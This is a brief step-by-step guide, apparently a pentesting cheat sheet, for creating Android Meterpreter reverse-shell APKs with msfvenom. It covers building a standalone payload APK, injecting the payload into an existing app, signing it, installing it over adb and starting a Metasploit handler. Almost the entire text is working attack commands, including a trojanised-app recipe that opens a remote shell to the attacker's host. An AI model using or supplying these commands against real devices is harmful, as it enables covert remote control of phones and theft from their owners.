APK with Metasploit Shell
Generic default APK auto-generated by msfvenom
-
Create the generic apk:
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=446 R> android_shell.apk
-
Sign and align it:
java -jar uber-apk-signer-1.3.0.jar --apks android_shell.apk
-
Install it:
adb -H IP_FROM_HOST_RUNNING_ADB_SERVER -P 5037 install android_shell-aligned-debugSigned.apk
-
Start reverse TCP handler on Kali:
$ msfconsole
-
$ use exploit/multi/handler
-
$ set payload android/meterpreter/reverse_tcp
-
$ set lhost YOUR_IP_ADDRESS
$ set lport 446
$ run
- Run the application in the Android phone and the reverse shell session should open.
Inject shell into Existing APK
-
Inject the payload in the desired app:
msfvenom -x app_name.apk -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=446 -o new_app_name.apk
-
install it:
adb -H YOUR_IP_ADDRESS -P 5037 install new_app_name.apk
-
Start reverse TCP handler on Kali:
$ msfconsole
-
$ use exploit/multi/handler
-
$ set payload android/meterpreter/reverse_tcp
-
$ set lhost YOUR_IP_ADDRESS
$ set lport 446
$ run
- Run the application in the Android phone and the reverse shell session should open.